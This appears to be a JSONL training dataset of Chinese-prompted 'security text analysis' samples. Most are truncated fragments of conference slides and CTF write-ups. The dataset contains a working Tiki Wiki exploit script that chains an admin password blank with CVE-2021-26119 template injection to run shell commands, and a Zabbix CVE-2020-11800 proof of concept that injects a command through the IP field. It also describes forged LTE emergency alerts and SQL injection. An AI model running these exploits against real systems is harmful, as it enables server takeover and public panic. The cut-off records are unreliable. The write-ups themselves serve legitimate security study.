vs 1000,000,000,000 Overview of Asura  Portable and reasonable GPU, Spark are still high-cost.  Posix Pthreads (explicit parallel programming model) Pthreads represent the assembly languages of parallelism. Maximum flexibility.  Parser  full scratch, without libpcap Flexible. More scalable compared with tshark (in some cases).  Compact but powerful Asura has thousands lines of code. Asura can process 76,835,550 packets in 200-400 minutes. Asura: Huge PCAP file vs Massive threads Worker thread 1N Master thread container PCAP files Worker thread 1N Master thread Reduction (task decomposition) Clustering (data deco", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport requests import sys import re def auth_bypass(s, t): d = { \"ticket\" : \"\", \"user\" : \"admin\", \"pass\" : \"trololololol\", } h = { \"referer\" : t } d[\"ticket\"] = get_ticket(s, \"%stiki-login.php\" % t) d[\"pass\"] = \"\" # blank login r = s.post(\"%stiki-login.php\" % t, data=d, headers=h) r = s.get(\"%stiki-admin.php\" % t) assert (\"You do not have the permission that is needed\" not in r.text), \"(-) authentication bypass failed!\" def black_password(s, t): uri = \"%stiki-login.php\" % t # setup cookies here s.get(uri) ticket = get_ticket(s, uri) d = { 'user':'admin', 'pass':'trololololol', } # crafted especially so unsuccessful_logins isn't recorded for i in range(0, 51): r = s.post(uri, d) if(\"Account requires administrator approval.\" in r.text): print(\"(+) admin password blanked!\") return raise Exception(\"(-) auth bypass failed!\") def get_ticket(s, uri): h = { \"referer\" : uri } r = s.get(uri) match = re.search('class=\"ticket\" name=\"ticket\" value=\"(.*)\" \\/>', r.text) assert match, \"(-) csrf ticket leak failed!\" return match.group(1) def trigger_or_patch_ssti(s, t, c=None): # CVE-2021-26119 p = { \"page\": \"look\" } h = { \"referer\" : t } bypass = \"startrce{$smarty.template_object->smarty->disableSecurity()->display('string:{shell_exec(\\\"%s\\\")}')}endrce\" % c d = { \"ticket\" : get_ticket(s, \"%stiki-admin.php\" % t), \"feature_custom_html_head_content\" : bypass if c else '', \"lm_preference[]\": \"feature_custom_html_head_content\" } r = s.post(\"%stiki-admin.php\" % t, params=p, data=d, headers=h) r = s.get(\"%stiki-index.php\" % t) if c != None: assert (\"startrce\" in r.text and \"endrce\" in r.text), \"(-) rce failed!\" cmdr = r.text.split(\"startrce\")[1].split(\"endrce\")[0] print(cmdr.strip()) def main(): if(len(sys.argv) < 4): print(\"(+) usage: %s <host> <path> <cmd>\" % sys.argv[0]) print(\"(+) eg: %s 192.168.75.141 / id\"% sys.argv[0]) print(\"(+) eg: %s 192.168.75.141 /tiki-20.3/ id\" % sys.argv[0]) return p = sys.argv[2] c = sys.argv[3] p = p + \"/\" if not p.endswith(\"/\") else p p = \"/\" + p if not ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1590-004-收集目标组织网络信息-网络拓扑 ## 来自ATT&CK的描述 在入侵受害者之前攻击者可能会收集受害者网络拓扑的信息网络拓扑的信息可能包括各种细节包括面向外部和内部网络环境的物理或逻辑布置这些信息可能还包括有关网络设备网关路由器等和其他基础结构的详细信息 攻击者可以通过不同的方式收集这些信息例如通过[主动扫描](https://contribute.knowledge.qihoo.net/detail/technique/T1595)或[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)网络拓扑信息也可能通过在线或其他可访问的数据集例如[搜索受害者拥有的网站](https://contribute.knowledge.qihoo.net/detail/technique/T1594)暴露给攻击者信息可能为如下活动提供可能性其他形式的侦察活动例如[搜索公开技术数据库](https://contribute.knowledge.qihoo.net/detail/technique/T1596)[搜索开放网站/域](https://contribute.knowledge.qihoo.net/detail/technique/T1593)建立运营资源例如[获取基础设施](https://contribute.knowledge.qihoo.net/detail/technique/T1583)或[入侵基础设施](https://contribute.knowledge.qihoo.net/detail/technique/T1584)或实现初始访问例如[外部远程服务](https://contribute.knowledge.qihoo.net/detail/technique/T1133) ## 测试案例 在内网进行网络拓扑信息收集的方法有很多对于在外网进行收集的方法可以通过谷歌语法网盘检索QQ群等方法收集 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 许多此类攻击活动的发生率很高并且相关的误报率也很高并且有可能发生在目标组织的视野之外从而使防御者难以发现 检测工作可能会集中在攻击者生命周期的相关阶段例如在\"初始访问\"阶段 ## 关联TIP [[T1590-001-收集目标组织网络信息-域属性]] [[T1590-002-收集目标组织网络信息-DNS]] [[T1590-003-收集目标组织网络信息-网络信任关系]] [[T1590-005-收集目标组织网络信息-IP地址]] [[T1590-006-收集目标组织网络信息-网络安全设备]] ## 参考推荐 MITRE-ATT&CK-T1590-004 <https://attack.mitre.org/techniques/T1590/004/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Politics of Privacy and Technology: Fighting an Uphill Battle Eric Fulton, CEO SubSector Solutions Daniel Zolnikov, MT House Representative Note, a prettier and updated version of this presentation can be obtained by emailing: daniel.zolnikov@gmail.com or eric@subsectorcorp.com Daniel Zolnikov MT State House Representative Still has a Blackberry.. @DanielZolnikov Eric Fulton Runs an information security consulting firm Adventures a lot @SubsectorCorp Preface Entire story takes place January - April 2013, before PRISM/NSA spying fiasco Daniel was serving his first term as a freshman legislator, focusing on privacy legislation.Eric worked behind the scenes formulating the legislation. Daniel will be running for the 2015 Montana legislature. Need For Privacy Laws Create legislation to enforce Montanas constitutional right to privacy RIGHT OF PRIVACY. The right of individual privacy is essential to the well-being of a free society and shall not be infringed without the showing of a compelling state interest. Sadly, rights and liberties have no meaning without laws clearly protecting them. Policy Frameworks Base proposed Montana law on existing frameworks  California's Civil Code 1798.14-1798.23  Massachusetts' 201 CMR 17.00  EUs Privacy Directive  Germanys Data Privacy Laws (Bundesdatenschutzgesetz or BDSG) California's Civil Code 1798.14- 1798.23 Each agency shall maintain in its records only personal information which is relevant and necessary to accomplish a purpose of the agency... Massachusetts' 201 CMR 17.00 Section 2 - Regulations to safeguard personal information of commonwealth residents Section 3 - Duty to report known security breach or unauthorized use of personal information Germanys Data Privacy Laws  Prevents organizations from collecting any personally identifiable information without obtaining permission from an individual  Permission for the collection of data must be specific including how, where, how long and for what purposes the data will be us", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLive Hacking like a MVH  A walkthrough on methodology and strategies to win big Frans Rosén  @fransrosen Frans Rosén  @fransrosen Frans Rosén @fransrosen Security Advisor at Detectify #6 on HackerOne leaderboard/all-time Blogs at labs.detectify.com Frans Rosén  @fransrosen Frans Rosén @fransrosen H1-702 2017: Winner of MVH in Vegas! (Uber, Salesforce, Zenefits) H1-514 2018: Winner of MVH in Montreal! (Shopify) H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath) H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath) H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath) H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber) H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath) H1-202 2018: Winner Best bug in Washington (Mapbox) H1-3120 2018: Winner Best bug in Amsterdam (Dropbox) H1-514 2018: Winner Highest reputation in Montreal (Shopify) Frans Rosén  @fransrosen Frans Rosén @fransrosen H1-702 2017: Winner of MVH in Vegas! (Uber, Salesforce, Zenefits) H1-514 2018: Winner of MVH in Montreal! (Shopify) H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath) H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath) H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath) H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber) H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath) H1-202 2018: Winner Best bug in Washington (Mapbox) H1-3120 2018: Winner Best bug in Amsterdam (Dropbox) H1-514 2018: Winner Highest reputation in Montreal (Shopify) Frans Rosén  @fransrosen What is Live Hacking? Frans Rosén  @fransrosen 30 second elevator pitch  A \"hacker-meets-dev face-to-face\" bug bounty with special targets  First by HackerOne in 2016 in Vegas  More companies runs these nowadays. H1, Bugcrowd, Facebook/Google, Visma. Smaller companies run their own also Frans Rosén  @fransrosen (Inofficial first event in 2015) Me and J", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPRESENTED BY:  Mandiant, A FireEye Company. All rights reserved. Investigating PowerShell Attacks DefCon 22 2014 August 8, 2014 Ryan Kazanciyan, Matt Hastings  Mandiant, A FireEye Company. All rights reserved. Background Case Study 2 Attacker Client Victim VPN WinRM, SMB, NetBIOS Victim workstations, servers  Fortune 100 organization  Compromised for > 3 years  Active Directory  Authenticated access to corporate VPN  Command-and-control via  Scheduled tasks  Local execution of PowerShell scripts  PowerShell Remoting  Mandiant, A FireEye Company. All rights reserved. Why PowerShell? 3 Execute commands Reflectively load / inject code Download files from the internet Enumerate files Interact with the registry Interact with services Examine processes Retrieve event logs Access .NET framework Interface with Win32 API It can do almost anything  Mandiant, A FireEye Company. All rights reserved.  PowerSploit  Reconnaissance  Code execution  DLL injection  Credential harvesting  Reverse engineering  Nishang  Posh-SecMod  Veil-PowerView  Metasploit  More to come PowerShell Attack Tools 4  Mandiant, A FireEye Company. All rights reserved. PowerShell Malware in the Wild 5  Mandiant, A FireEye Company. All rights reserved. Investigation Methodology 6 evil.ps1 Local PowerShell script backdoor.ps1 Persistent PowerShell Registry File System Event Logs Memory Network Traffic Sources of Evidence WinRM PowerShell Remoting  Mandiant, A FireEye Company. All rights reserved.  Has admin (local or domain) on target system  Has network access to needed ports on target system  Can use other remote command execution methods to:  Enable execution of unsigned PS scripts  Enable PS remoting Attacker Assumptions 7  Mandiant, A FireEye Company. All rights reserved. Version Reference 8 2.0 3.0 4.0 Default Default (R2) Default Default Default (SP1) Default (R2 SP1) Requires WMF 4.0 Update Requires WMF 4.0 Update Requires WMF 4.0 Update Requires WMF 3.0 Update Requires WMF 3.0 Update Memory Analysis ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHijacking the Outdoor Digital Billboard Tottenkoph ~ Rev ~ Philosopher Who are we? Tottenkoph tottenkoph@gmail.com Member; Hackers for Charities Rev Host; Denver, CO 2600 Philosopher Member; Denver, CO 2600 What do we cover?  Tools and Information Needed In case you wanted to try hacking the billboard, heres some information and tools that will come in handy. <Obligatory Disclaimer> We are not suggesting, teaching, or condoning the hacking of The Companys Outdoor Digital Billboard Network. </Obligatory Disclaimer>  Physical and Network Vulnerabilities Yes, they exist and yes, there are many of them What do we cover?  What *NOT* to Do A few things that you would want to avoid if you were going to attempt hacking the billboard. (See previous slide for Obligatory Disclaimer)  The Purpose a Hacked Digital Billboard Serves Who would want to do this? Why? Why did we do it?  Was told, I bet you cant hack that.  No one had done it yet  Saw it as a possible target for future lulz  We were drunk and it sounded like a good idea at the time Who are they?  International telecommunications company  Boasts that they have the only digital billboard network in the country This is quickly changing as other companies are realizing they can save and make money by doing this as well as get the environmentalists off their back (can claim theyre being green by not building more billboards). By the time that this presentation is given, they will also have added billboards in various parts of Europe. The Company (Cont.)  VERY litigation happy They have a super big team of lawyers (we assume) and we have none. So were not going to specify which company it is and maintain that this is for informational purposes only. </ass covering>  Appears as the blurry thing in all of our pictures Blurred out because, again, theyre very litigation happy.  Utilizes different manufacturers for their boards This provides various ways to get into their network. Billboard To our knowledge, three primary types o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhen Space Elephants A/ack DEFCON 19 Presented by Abstrct Who Am I?  Expert in designing videogame UI  Specialized in Human-Computer InteracJon  Graphic Designer  Technical Writer Who am I really? Database and InformaJon Security Geek What is The Schemaverse?  Space game built enJrely in PostgreSQL  No UI other than the output of SQL queries  Database is completely open to the Internet  Security implemented within the database itself  Unexpectedly addicJve, fun and challenging Why?  Be Educated and Educate on Database Design and Security  Push Database Systems  Its also pre/y funny Architecture SECURITY Securing PostgreSQL.. Insecurely  Query Limits  AuthenJcaJon  SQL InjecJons  some database communiJes were less than helpful SQL InjecJon Example -- Fleet Script Creation EXECUTE  CREATE OR REPLACE FUNCTION FLEET_SCRIPT_'|| NEW.id ||'() RETURNS boolean as $fleet_script$ DECLARE this_fleet_id integer; ' || NEW.script_declarations ||  BEGIN this_fleet_id := '|| NEW.id||'; ' || NEW.script ||  RETURN 1; END $fleet_script$ LANGUAGE plpgsql;'::TEXT; SQL InjecJon Example -- Fleet Script Creation EXECUTE  CREATE OR REPLACE FUNCTION FLEET_SCRIPT_'|| NEW.id ||'() RETURNS boolean as $fleet_script$ DECLARE this_fleet_id integer; ' || NEW.script_declarations ||  BEGIN this_fleet_id := '|| NEW.id||'; ' ||  UPDATE player SET balance=0; RETURN 1; END $fleet_script$ LANGUAGE plpgsql SECURITY DEFINER; CREATE OR REPLACE FUNCTION MOVE() RETURNS boolean as $fleet_script$ BEGIN --add the move code but altered slightly to send players backwards  ||  RETURN 1; END $fleet_script$ LANGUAGE plpgsql;'::TEXT; SQL InjecJon Fix -- Fleet Script Creation secret := 'fleet_script_' || (RANDOM()*1000000)::integer; EXECUTE  CREATE OR REPLACE FUNCTION FLEET_SCRIPT_'|| NEW.id ||'() RETURNS boolean as $'||secret||'$ DECLARE this_fleet_id integer; ' || NEW.script_declarations ||  BEGIN this_fleet_id := '|| NEW.id||'; ' || NEW.script ||  RETURN 1; END $'||secret||'$ LANGUAGE plpgsql;'::TEXT; SchemaSecurity  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021GKCTF-NAN-WP NaN 战队隶属 Nu1L 2.0 计划有兴趣加入者可发送个人简历至 root@nu1l.com 队伍名称NAN 队伍成员 Siebene pray77 SYJ 一Reverse  1. QQQQT 使用 exeinforpe 检查发现是用的 Enigma Virtual Box 打的包 下载工具 EnigmaVBUnpacker 将 exe 解包一下 得到 QQQQT_unpacked.exe 拖入 IDA 分析  关键逻辑在函数 sub_4012F0 里面就是一个标准的 base58然后比较字符串写个脚 本解一下即可 查找字符串得到比较数据和 base58 的码表56fkoP8KhwCf3v7CEz 和 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz 写一个脚本解一下即可 # _*_ coding: utf-8 _*_ # editor: SYJ # function: Reversed By SYJ # describe: def b58encode(tmp:str) -> str: tmp = list(map(ord,tmp)) temp = tmp[0] base58 = \"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz\" for i in range(len(tmp)-1): temp = temp * 256 + tmp[i+1] tmp = [] while True: tmp.insert(0,temp % 58) temp = temp // 58 if temp == 0: break temp = \"\" for i in tmp: temp += base58[i] return temp def b58decode(tmp:str) -> str: import binascii base58 = \"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz\" temp = [] for i in tmp: temp.append(base58.index(i)) tmp = temp[0] for i in range(len(temp)-1): tmp = tmp * 58 + temp[i+1] return binascii.unhexlify(hex(tmp)[2:].encode(\"utf-8\")).decode(\"UTF-8\") cmp = \"56fkoP8KhwCf3v7CEz\" print('flag{' + b58decode(cmp) + '}') # 得到 flag 为flag{12t4tww3r5e77} 2. app-debug 得到 apk直接拖入 jadx得到关键逻辑 其实很简单就是 MainActivity 里面调用的 check 函数检测我们输入的 flag而 check 函数 是 System.loadLibrary(\"native-lib\"); 使用工具 apk-tools 获取一下 apk 的资源然后将 lib 文件夹里面的 so 拖入 IDA 进行分析 shift+f12 查找字符串发现会检测是否被调试 交叉引用一下发现检测调试的函数是 sub_738378DF3C 然后关键的 check 函数是 Java_com_example_myapplication_MainActivity_check 里面是将我们输入的字符串进行 TEA 加密, 里面有比较数据 使用 IDA 和 adb 调试一下可以发现 key即那四个数字被改变 然后写个 C 脚本解一下即可 #include <stdio.h> #include <stdint.h> void encrypt (uint32_t* v, uint32_t* k) { uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */ uint32_t delta=0x458BCD42; /* a key schedule constant */ uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ for (i=0; i < 32; i++) { /* basic cycle start */ sum += delta; v0 += ((v1<<4) + k0)  (v1 + sum)  ((v1>>5) + k1); v1 += ((v0<<4) + k2)  (v0 + sum)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n警告:10级地震将在一分钟内发生 李伟光 weelight.li@gmail.com ! 360 独角兽团队 演讲内容 01 关于公共预警系统与LTE网络 02 LTE协议中的漏洞 03 触发漏洞 a. 搭建一个伪基站 b. 伪造虚假的预警消息 04 结论! 01 公共预警系统与LTE网络 针对这些灾害对公众发出警告信息 PWS警告系统遍布全球 ETWS KPAS EU-ALERT CMAS  2018年1月的夏威夷导弹警报 新闻  2018年1月的夏威夷导弹警报 新闻 02 LTE协议中的漏洞 LTE协议中的漏洞 1. 目前的标准中并未加入对警报信息的签名等验证信息. 2. 手机在进行小区重选的时候如果没有触发位置区更新流程(TAU) 手机是不会对基站的合法性进行甄别! ! Attack!vector 03 触发漏洞 如何搭建一个LTE伪基站 USRP!B210 ThinkPad! srsLTE!/srsENB 硬件 软件 使之像正常基站一样工作 获取当前合法基站的配置参数 在srsENB平台上进行配置 用于发现LTE网络的应用软件 srsLTE配置文件 PWS!Message's!CarrierSystem!Information!Block SIB(Type(1( SIB!scheduling!information SIB(Type(2( Common!and!shared!channel! information SIB(Type(3( Cell!re-selection!information! SIB(Type(4( Cell!re-selection!information! intra-frequency!neighbor! information SIB(Type(5( Cell!re-selection!information! Intra-frequency!neighbor! information SIB(Type(6( Cell!re-selection!information! for!UTRA SIB(Type(7( Cell!re-selection!information! for!GERAN SIB(Type(8( Cell-re-selection!information! for!CDMA2000 SIB(Type(9( Home!eNB!identifier SIB(Type(10( ETWS!primary!notification! (Japan) SIB(Type(11( ETWS!Secondary!Notification! (Japan) SIB(Type(12( EU-Alert!(Europe)! KPAS!(South!Korea)! CMAS!notification(USA)! 伪造ETWS警报消息 警报消息的四个主要部分  SIB!10!:第一级警报信息(直接携带警报消息)  SIB!11!:第二级警报信息(直接携带警报消息)  Paging!:向用户手机提示有警报消息需要接收  SIB!1:!SIB 1负责对SIB10以及SIB11的调度 ETWS第一级警报信息  ETWS第一级警报信息中不能包含某些特定的消息内容. 发送ETWS第一级警报信息的主要源代码 虚假地震预警演示  自定义内容  ETWS第二级警报信息支持消息细分  它支持GSM-7和UCS-2字符编码标准 ETWS第二级警报信息 ETWS第二级警报信息 发送ETWS第二级警报信息的源代码 不仅仅是警告信息  将消息标识符设置为0x1104而不是0x1102  没有响亮的警报声只是温和的铃声  警告邮件可伪装成垃圾邮件其中可能包含广告网上诱骗网 站或欺诈邮件 Google Pixel实验演示 (a)英文地震警告信息 (b)中文地震警告信息 (c)包含钓鱼网站链接的垃圾邮件 (d)包含诈骗电话的垃圾邮件 (a)! (b)! (c)! (d)! 网络钓鱼警告消息演示 iPhone实验演示 l 由于PWS不是所有国家的强制性规范不同型 号的手机可能会有不同的反应. l 我们测试的iPhone不响应主ETWS警告消息但 它可以响应辅助ETWS警告消息. l 国行版的苹果手机也仅在MCC为001,MNC为01的 测试网络中对警报信息作出响应 iPhones!Response iPhone的实验演示 结论 风险 &缓解 潜在风险 警告一分钟后将发生10级地震 接下来会发生什么? 这会造成巨大的恐慌甚至发生踩踏事件造成难以想象的 后果 减轻危害  验证虚假基站的真实性 1.防止手机接入伪基站在满足了小区重选准则后 手机还要通过判断广播消息的中的数字签名数字签 名是由网络侧的私钥进行计算并且添加到广播消息中 的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\njobs === 显示作业的状态 ## 概要 ```shell jobs [-lnprs] [jobspec ...] jobs -x command [args] ``` ## 主要用途 - 显示作业的状态 - 列出活动的作业 - 列出停止的作业 ## 选项 ```shell -l 在作业信息中额外的列出PID -n 只列出最近一次通知以来状态变更的作业 -p 只列出PID -r 只输出处于运行状态的作业 -s 只输出处于停止状态的作业 ``` ## 返回值 返回状态为成功除非给出了非法选项执行出现错误 如果使用`jobs -x command [args]`形式执行那么返回值为`command`的退出状态 ## 例子 ```shell [user2@pc] ssh 192.168.1.4 pc@192.168.1.4's password: # 此时按下ctrl+z使得交互停止 [1]+ Stopped ssh 192.168.1.4 [user2@pc] sleep 60 & [2] 13338 [user2@pc] jobs [1]- Stopped ssh 192.168.1.4 [2] Running sleep 60 & [user2@pc] jobs -l [1]- 12927 Stopped ssh 192.168.1.4 [2] 13338 Running sleep 60 & [user2@pc] jobs -p 12927 13338 [user2@pc] jobs -s [1]- Stopped ssh 192.168.1.4 [user2@pc] jobs -r [2] Running sleep 60 & [user2@pc] kill -9 12927 [2] Done sleep 60 [user2@pc] jobs -n -l [1]+ 12927 Killed ssh 192.168.1.4 [user2@pc] jobs -n -l ``` ### 注意 1. `bash`的作业控制命令包括`bg fg kill wait disown suspend` 2. 该命令需要`set`选项`monitor`处于开启状态时才能执行查看作业控制状态输入`set -o`查看`monitor`行执行`set -o monitor`或`set -m`开启该选项 3. 该命令是bash内建命令相关的帮助信息请查看`help`命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Vampires * Category: Web * 100 Points * Solved by the JCTF Team ## Description > I have never met a vampire, I don't know what might happen tomorrow. \"The strength of the vampire is that people will not believe in him\". There's no set-in-stone way to be a vampire, especially with the evil ones. > > URL: https://vampires.ctf.bsidestlv.com:8001/ > > Bruteforce is not the answer! ## Solution We visit the attached site and see: ```console root@kali:/media/sf_CTFs/bsidestlv/Vampires# curl -v https://vampires.ctf.bsidestlv.com:8001/ * Trying 18.157.75.151... * TCP_NODELAY set * Expire in 200 ms for 4 (transfer 0x55a0876380c0) * Connected to vampires.ctf.bsidestlv.com (18.157.75.151) port 8001 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: none CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (OUT), TLS alert, unknown CA (560): * SSL certificate problem: self signed certificate * Closing connection 0 curl: (60) SSL certificate problem: self signed certificate More details here: https://curl.haxx.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above. ``` This is a website served over TLS with an untrusted, self-signed certificate. We can bypass the certificate validation and check the website by adding `-k`: ```console root@kali:/media/sf_CTFs/bsidestlv/Vampires# curl -k https://vampires.ctf.bsidestlv.com:8001/ <!DOCTYPE html> <html> <head> <title>Vempire login page</title> <link rel=\"stylesheet\" type=\"text/css\" href=\"./style.css\"> </head> <body> <div class=\"container\"> <div class=\"error\"> <p class=\"p\">L</p> <span class=\"dracula\"> <div class=\"con\"> <div class=\"hair\"></div> <div class=\"hair-r\"></div> <div cla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Zabbix Server trapper命令注入漏洞CVE-2020-11800 Zabbix 是由Alexei Vladishev 开发的一种网络监视管理系统基于 Server-Client 架构在[CVE-2017-2824][1]中其Server端 trapper command 功能存在一处代码执行漏洞而修复补丁并不完善导致可以利用IPv6进行绕过注入任意命令 参考链接 - https://xz.aliyun.com/t/8991 ## 环境搭建 执行如下命令启动一个完整的Zabbix环境包含Web端Server端1个Agent和Mysql数据库 ``` docker compose up -d ``` 命令执行后执行`docker compose ps`查看容器是否全部成功启动如果没有可以尝试重新执行`docker compose up -d` 利用该漏洞需要你服务端开启了自动注册功能开启方法请参考[CVE-2017-2824][1] ## 漏洞复现 修改[CVE-2017-2824][1]的POC中的IP字段构造新的POC ```python import sys import socket import json import sys def send(ip, data): conn = socket.create_connection((ip, 10051), 10) conn.send(json.dumps(data).encode()) data = conn.recv(2048) conn.close() return data target = sys.argv[1] print(send(target, {\"request\":\"active checks\",\"host\":\"vulhub\",\"ip\":\"ffff:::;touch /tmp/success2\"})) for i in range(10000, 10500): data = send(target, {\"request\":\"command\",\"scriptid\":1,\"hostid\":str(i)}) if data and b'failed' not in data: print('hostid: %d' % i) print(data) ``` 当查看到如下结果时则说明命令执行成功 ![](1.png) 进入server容器可见`/tmp/success2`已成功创建 ![](2.png) 有兴趣的同学可以对这个POC进行改进提交Pull Request [1]: ../CVE-2017-2824", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 进程 > 注 : 笔记中拓扑图 drawio 源文件在其图片目录下 --- <p align=\"center\"> <a href=\"http://turnoff.us/geek/zombie-processes/\"><img src=\"../../../../assets/img/banner/进程.png\" width=\"70%\"></a> </p> --- ## 基础 ### 线程和进程的关系 多进程和多线程都是并发都可以提高处理器的利用效率,但在 Linux 系统中进程和线程几乎没有区别 编译好的可执行程序只是一个文件不是进程可执行文件必须要载入内存包装成一个进程才能真正跑起来进程是要依靠操作系统创建的每个进程都有它的固有属性比如进程号PID进程状态打开的文件等等进程创建好之后读入你的程序你的程序才被系统执行 对于操作系统进程就是一个数据结构. 从 Linux 内核的角度来看并没有把线程和进程区别对待系统调用 `fork()` 可以新建一个子进程函数 `pthread()` 可以新建一个线程但无论线程还是进程都是用 task_struct 结构表示的唯一的区别就是共享的数据区域不同 换句话说线程看起来跟进程没有区别只是线程的某些数据区域和其父进程是共享的而子进程是拷贝副本而不是共享 所以说我们的多线程程序要利用锁机制避免多个线程同时往同一区域写入数据否则可能造成数据错乱 那么你可能问既然进程和线程差不多而且多进程数据不共享即不存在数据错乱的问题为什么多线程的使用比多进程普遍得多呢 因为现实中数据共享的并发更普遍呀比如十个人同时从一个账户取十元我们希望的是这个共享账户的余额正确减少一百元而不是希望每人获得一个账户的拷贝每个拷贝账户减少十元 ### 文件描述符 ```c++ struct task_struct { // 进程状态 long state; // 虚拟内存结构体 struct mm_struct *mm; // 进程号 pid_t pid; // 指向父进程的指针 struct task_struct __rcu *parent; // 子进程列表 struct list_head children; // 存放文件系统信息的指针 struct fs_struct *fs; // 一个数组包含该进程打开的文件指针 struct files_struct *files; }; ``` task_struct 就是 Linux 内核对于一个进程的描述也可以称为进程描述符 其中比较有意思的是 mm 指针和 files 指针mm 指向的是进程的虚拟内存也就是载入资源和可执行文件的地方files 指针指向一个数组这个数组里装着所有该进程打开的文件的指针 一般来说一个进程会从 `files[0]` 读取输入将输出写入 `files[1]`将错误信息写入 `files[2]` 举个例子以我们的角度 C 语言的 printf 函数是向命令行打印字符但是从进程的角度来看就是向 `files[1]` 写入数据同理scanf 函数就是进程试图从 `files[0]` 这个文件中读取数据 每个进程被创建时files 的前三位被填入默认值分别指向标准输入流标准输出流标准错误流我们常说的文件描述符就是指这个文件指针数组的索引所以程序的文件描述符默认情况下 0 是输入1 是输出2 是错误 对于一般的计算机输入流是键盘输出流是显示器错误流也是显示器所以现在这个进程和内核连了三根线因为硬件都是由内核管理的我们的进程需要通过系统调用让内核进程访问硬件资源 如果我们写的程序需要其他资源比如打开一个文件进行读写这也很简单进行系统调用让内核把文件打开这个文件就会被放到 files 的第 4 个位置 明白了这个原理输入重定向就很好理解了程序想读取数据的时候就会去 `files[0]` 读取所以我们只要把 `files[0]` 指向一个文件那么程序就会从这个文件中读取数据而不是从键盘 ```bash command < file.txt ``` 同理输出重定向就是把 `files[1]` 指向一个文件那么程序的输出就不会写入到显示器而是写入到这个文件中 ```bash command > file.txt ``` 错误重定向也是一样的就不再赘述 管道符其实也是异曲同工把一个进程的输出流和另一个进程的输入流接起一条管道数据就在其中传递 ```bash cmd1 | cmd2 | cmd3 ``` 不管是设备另一个进程socket 套接字还是真正的文件全部都可以读写统一装进一个简单的 files 数组进程通过简单的文件描述符访问相应资源具体细节交于操作系统 ### 孤儿进程 一个父进程退出而它的一个或多个子进程还在运行那么这些子进程将成为孤儿进程孤儿进程将", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2018 0CTF Author: Nu1L 2018 0CTF Author: Nu1L Misc hidden message Welcome MathGame Baby VM 2 Web ezDoor (Done) h4x0rs.club 1 (Done) h4x0rs.club 2 (Done) LoginMe (Done) Reverse g0g0g0 (Done) babyvm (solved) udp (Done) Pwnable Baby Stack 2018 Baby heap 2018 (solved) Zer0 FS (solved) Black Hole Theory Misc hidden message tcp wikiflag Welcome irctitle MathGame This is a challenge about using printf to do subtraction. I first figured out how to take the number b by using wildcard precision specifier like this %1$.*4$d . And then used a pretty hacky way (kinda hard to elaborate, see the script) to generate -b . Finally I can perform a-b as a+(- b) . One thing to note is that we are not given the path of the flag. I dumped some info from /proc/self/maps and saw the path of current binary, and guessed /home/subtraction/flag is the flag path. Full exploit can be found here. Baby VM 2 I really enjoyed solving this challenge (though it brings much pain for my lack of knowledge on NTFS) since there're few Winternals -related challenges in CTF. The first thing I thought about when I saw DeviceIoControl is reparse point , since the path is filtered and we need to read from somewhere out of this directory. By using FSCTL_SET_REPARSE_POINT , we can actually create a mount point (a.k.a. junction ) to C:\\flag\\ (Though we can't create symlinks since we don't hold the privilege required.). By reversing, I found only backslashes , dots and question marks are filtered, slashes are not filtered, so we can use this as seperator, (and the filtering is not perfect, we can do directory traversal like this .txt/../../../../../../flag/ , but seems not exploitable). And then I spent several hours trying to figure out how to create a 